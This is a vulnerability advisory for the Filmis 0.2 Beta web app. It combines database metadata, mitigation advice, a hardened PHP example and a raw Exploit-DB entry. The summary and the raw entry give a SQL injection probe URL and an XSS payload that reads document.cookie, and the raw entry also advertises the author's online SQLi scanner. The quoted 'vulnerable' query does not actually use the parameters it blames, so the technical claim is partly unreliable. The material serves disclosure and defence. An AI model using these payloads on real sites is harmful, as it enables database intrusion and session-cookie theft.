Vendor: Filmis
By: M.Jock3R
CVSS: 7.5 (HIGH)
Type: SQL Injection and XSS
CWE: 89
Product Name: Filmis
Affected Version From: 0.2 Beta
Affected Version To: 0.2 Beta
Patch Exists: NO
Related CWE: N/A
CPE: a:mohshow:filmis:0.2beta
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 FR
2009

Filmis – Version 0.2 Beta SQL Injection and XSS Vulnerabilities

The Filmis - Version 0.2 Beta web application is vulnerable to both SQL Injection and XSS attacks. The vulnerable code is located in the cat.php file, where the $idcat variable (and, likewise, the nb page parameter) is read from the query string and used without being sanitized before it reaches an SQL query or the page output. An attacker can exploit the SQL injection by sending a maliciously crafted HTTP request to the vulnerable web application, such as http://localhost/filmis/cat.php?nb=-1'. For XSS, the same parameter can be used to inject script into the page, such as http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL queries. Additionally, output encoding should be used to ensure that user-supplied data is not interpreted as HTML or JavaScript.
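The following is an added example of how the cat.php fragment could be hardened along the lines of the mitigation above; it is not Filmis code. It assumes a PDO connection in $pdo, the $prefix table prefix that the original query uses, a hypothetical idcat column to filter on, and a hypothetical titre column for output.

```php
<?php
// Added example, not part of Filmis: hardened handling of the id and nb
// query parameters from cat.php. Assumes $pdo (PDO connection) and $prefix
// (table prefix) are provided by the application's configuration.
declare(strict_types=1);

/**
 * Read a positive integer from the query string.
 * Missing or empty values fall back to the default; anything that is not a
 * positive integer (e.g. "-1'" or "1><script>") is rejected before it can
 * reach SQL or HTML.
 */
function readPositiveInt(array $query, string $key, int $default): int
{
    if (!isset($query[$key]) || $query[$key] === '') {
        return $default;
    }
    $value = filter_var(
        $query[$key],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($value === false) {
        throw new InvalidArgumentException("Invalid value for {$key}");
    }
    return $value;
}

/**
 * Fetch one page of films with bound parameters instead of string
 * concatenation. The table name comes only from trusted configuration.
 * The idcat filter column is an assumption for this example.
 */
function fetchFilmsPage(PDO $pdo, string $prefix, int $idcat, int $nb, int $perPage = 28): array
{
    $offset = ($nb - 1) * $perPage;
    $table  = $prefix . 'film';
    $stmt = $pdo->prepare(
        "SELECT * FROM `{$table}` WHERE idcat = :idcat LIMIT :limit OFFSET :offset"
    );
    $stmt->bindValue(':idcat', $idcat, PDO::PARAM_INT);
    $stmt->bindValue(':limit', $perPage, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Encode a value before echoing it into HTML so it cannot become markup or script. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hypothetical wiring for cat.php: validate first, fail closed on bad input.
try {
    $idcat = readPositiveInt($_GET, 'id', 1);
    $nb    = readPositiveInt($_GET, 'nb', 1);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('Bad request');
}

$films = fetchFilmsPage($pdo, $prefix, $idcat, $nb);
echo '<p>Page ' . h((string) $nb) . '</p>';
foreach ($films as $film) {
    // 'titre' is an assumed column name for this example.
    echo '<li>' . h((string) $film['titre']) . '</li>';
}
```

The two controls are independent: the integer validation stops both payloads shown on this page at the door, while the bound parameters and output encoding still protect the query and the page if some other code path passes a string through.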
Source

Exploit-DB raw data:

===================================================================================

 Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

===================================================================================

# Exploit Title: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

# Author: M.Jock3R 

# USE MY ONLINE SQLI SCAN TOOL[CODED By ME] : http://dzcode.tk/sql.php (To discover that such exploit) 

# Download Script(Official site): http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip

# Category:: webapps

# Tested on: Windows XP SP2 FR

  

===================================================================================

 

Vuln file : cat.php

  

Vuln Code :

---------- 

$idcat = $_GET['id'];                       // category id taken straight from the query string
$nbitemparpage= "28";                       // items per page
if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; }   // page number, also unvalidated
$nbd = ceil(($nb -1) * $nbitemparpage);     // page offset computed from the raw $nb
$amem = mysql_query("SELECT * FROM ".$prefix."film");   // query built by string concatenation, no prepared statement

Exploit:

---------

1/SQL INJECTION :

http://localhost/filmis/cat.php?nb=-1'

2/XSS :

http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>

===================================================================================

Greets To :

adelsbm / attiadona  / Wprojects.tk



Email : madrido.jocker@gmail.com

  

THANKS TO ALL ALGERIANS HACK3RS

===================================================================================